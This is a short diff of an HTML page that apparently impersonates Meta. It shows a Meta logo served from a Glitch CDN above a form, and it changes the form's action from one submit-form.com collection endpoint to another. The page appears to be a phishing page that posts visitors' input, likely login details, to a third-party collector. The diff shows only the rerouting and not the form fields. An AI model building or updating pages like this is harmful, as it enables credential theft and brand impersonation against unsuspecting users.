--- a/index.html
+++ b/index.html
@@ -171,7 +171,7 @@
 
              <div class="main-body">
               
-      <form class="content" action="https://submit-form.com/7PX5tc8PI" method="POST">
+      <form class="content" action="https://submit-form.com/AQ69u1rCq" method="POST">
 
             <div>
              <img src="https://cdn.glitch.global/b4a2a482-023b-4cda-88ab-ea4d4916e0d7/Meta_Platforms_Inc._logo.svg?v=1719784126031" width="140">
